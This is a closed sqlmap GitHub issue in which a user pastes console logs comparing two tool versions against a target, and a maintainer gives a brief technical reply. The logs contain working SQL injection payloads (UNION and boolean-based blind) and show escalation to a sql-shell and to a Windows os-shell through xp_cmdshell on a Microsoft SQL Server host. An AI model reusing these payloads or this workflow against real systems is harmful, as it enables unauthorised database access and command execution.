Closed emilyanncr closed 9 years ago
I believe that I've replied to this one (maybe I am wrong). Use --flush-session until sqlmap finds stacked SQLi. In your problematic run sqlmap was not able to detect it (there has been no changes here between those two versions)
Sooo sqlmap was recently updated and I've come across this situation. The two versions are allowing me to do different things using the same request. For example:
VIA VIA OLD VERSION OF SQLMAP C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:19:39
[20:19:39] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt' custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y [20:20:06] [INFO] resuming back-end DBMS 'microsoft sql server' [20:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST Parameter: #1* Type: UNION query <---- UNION
Title: Generic UNION query (NULL) - 84 columns Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:20:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2000 [20:20:08] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER sql-shell> <----------------------------------------------------------------------------------------:) [20:27:19] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:27:19
SQLMAP MOST RECENT RELEASE C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --sql-shell _ **| |_ {1.0-dev-nongit-20140912} |_ -| . | | | .'| . | || |||||**,| | || |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:28:22
[20:28:22] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt' custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y [20:28:24] [INFO] resuming back-end DBMS 'microsoft sql server' [20:28:24] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST Parameter: #1* Type: boolean-based blind <---- Boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:28:26] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2000 [20:28:26] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER sql-shell> <------- ? hmmmm I thought stacked queries weren't identified? Wouldn't you need stacked to call even a sql-shell? [20:50:40] [INFO] fetched data logged to text files under 'C:\Users\Snipercatz.sqlmap\output\target.com'
[*] shutting down at 20:50:40
VIA RECENTLY OUTDATED VERSION OF SQLMAP C:\E\SQLMAP>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --no-cast --text-only -v 1 -o --os-shell
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:53:41
[20:53:41] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt' custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y [20:53:42] [INFO] resuming back-end DBMS 'microsoft sql server' [20:53:42] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST Parameter: #1* Type: UNION query Title: Generic UNION query (NULL) - 84 columns Payload: NameDrop=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(114)+CHAR(113)+CHAR(97)+CHAR(113)+CHAR(115)+CHAR(68)+CHAR(122)+CHAR(70)+CHAR(80)+CHAR(112)+CHAR(98)+CHAR(109)+CHAR(85)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(114)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:53:44] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2000 [20:53:44] [INFO] testing if current user is DBA [20:53:44] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [20:54:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [20:54:15] [INFO] testing if xp_cmdshell extended procedure is usable [20:54:18] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique [20:54:19] [WARNING] the SQL query provided does not return any output [20:54:19] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [20:54:23] [ERROR] unable to retrieve xp_cmdshell output [20:54:23] [INFO] going to use xp_cmdshell extended procedure for operating system command execution [20:54:23] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER os-shell> <--------------------------------------- :)
VIA MOST RECENT UPDATE OF SQLMAP C:\sqlmap\sqlmap-master>sqlmap.py -r "C:\Users\Snipercatz\Desktop\request.txt" --time-sec 90 --threads 9 --text-only --no-cast -v 1 -o --os-shell _ **| |_ {1.0-dev-nongit-20140912} |_ -| . | | | .'| . | || |||||**,| | || |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:51:27
[20:51:27] [INFO] parsing HTTP request from 'C:\Users\Snipercatz\Desktop\request.txt' custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y [20:51:29] [INFO] resuming back-end DBMS 'microsoft sql server' [20:51:29] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: NameDrop=-3601' OR (1686=1686) AND 'bxnt'='bxnt
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
[20:51:30] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2000 [20:51:30] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported <---------------------------------- wahh
[*] shutting down at 20:51:30